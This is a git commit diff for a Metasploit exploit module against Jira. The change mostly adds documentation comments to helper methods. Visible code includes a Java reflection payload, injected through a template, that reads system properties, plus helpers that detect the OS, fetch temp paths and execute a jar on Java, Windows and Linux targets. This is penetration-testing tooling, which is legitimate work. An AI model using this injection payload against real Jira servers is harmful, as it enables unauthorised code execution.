Doc
wchen-r7
parent
f33e63c16f
commit
67edf88c39
|
|
@ -294,15 +294,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
|
||||
# Returns the target platform.
|
||||
#
|
||||
# @param cookie [String] Jira cookie
|
||||
# @return [String]
|
||||
def get_target_platform(cookie)
|
||||
c = get_os_detection_code
|
||||
res = inject_template(c, cookie)
|
||||
json = res.get_json_document
|
||||
if json['message']
|
||||
return json['message']
|
||||
end
|
||||
|
||||
nil
|
||||
json['message'] || ''
|
||||
end
|
||||
|
||||
|
||||
|
|
@ -320,26 +320,44 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
|
||||
# Returns the Java code that gives us the remote Java home path.
|
||||
#
|
||||
# @return [String]
|
||||
def get_java_path_code
|
||||
get_java_property_code('java.home')
|
||||
end
|
||||
|
||||
|
||||
# Returns the OS/platform information.
|
||||
#
|
||||
# @return [String]
|
||||
def get_os_detection_code
|
||||
get_java_property_code('os.name')
|
||||
end
|
||||
|
||||
|
||||
# Returns the temp path for Java.
|
||||
#
|
||||
# @return [String]
|
||||
def get_temp_path_code
|
||||
get_java_property_code('java.io.tmpdir')
|
||||
end
|
||||
|
||||
|
||||
# Returns a system property for Java.
|
||||
#
|
||||
# @param prop [String] Name of the property to retrieve.
|
||||
# @return [String]
|
||||
def get_java_property_code(prop)
|
||||
%Q| $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{prop}').toString() |
|
||||
end
|
||||
|
||||
|
||||
# Returns the Java code to execute a jar file.
|
||||
#
|
||||
# @param java_path [String] Java home path
|
||||
# @param war_path [String] The jar file to execute
|
||||
# @return [String]
|
||||
def get_jar_exec_code(java_path, war_path)
|
||||
# A quick way to check platform insteaf of actually grabbing os.name in Java system properties.
|
||||
if /^\/[[:print:]]+/ === war_path
|
||||
|
|
@ -436,6 +454,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
|
||||
# Checks if the target os/platform is compatible with the module target or not.
|
||||
#
|
||||
# @return [TrueClass] Compatible
|
||||
# @return [FalseClass] Not compatible
|
||||
def target_platform_compat?(target_platform)
|
||||
target.platform.names.each do |n|
|
||||
if /^java$/i === n || /#{n}/i === target_platform
|
||||
|
|
@ -460,6 +482,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
|
||||
# Returns a temp path from the remote target.
|
||||
#
|
||||
# @param cookie [String] Jira cookie
|
||||
# @return [String]
|
||||
def get_tmp_path(cookie)
|
||||
c = get_temp_path_code
|
||||
res = inject_template(c, cookie)
|
||||
|
|
@ -467,6 +493,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
json['message'] || ''
|
||||
end
|
||||
|
||||
|
||||
# Returns the Java home path used by Jira.
|
||||
#
|
||||
# @param cookie [String] Jira cookie.
|
||||
# @return [String]
|
||||
def get_java_home_path(cookie)
|
||||
c = get_java_path_code
|
||||
res = inject_template(c, cookie)
|
||||
|
|
@ -475,6 +506,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
|
||||
# Exploits the target in Java platform.
|
||||
#
|
||||
# @return [void]
|
||||
def exploit_as_java(cookie)
|
||||
tmp_path = get_tmp_path(cookie)
|
||||
|
||||
|
|
@ -503,6 +537,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
|
||||
# Exploits the target in Windows platform.
|
||||
#
|
||||
# @return [void]
|
||||
def exploit_as_windows(cookie)
|
||||
tmp_path = get_tmp_path(cookie)
|
||||
|
||||
|
|
@ -531,6 +568,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
|
||||
# Exploits the target in Linux platform.
|
||||
#
|
||||
# @return [void]
|
||||
def exploit_as_linux(cookie)
|
||||
tmp_path = get_tmp_path(cookie)
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue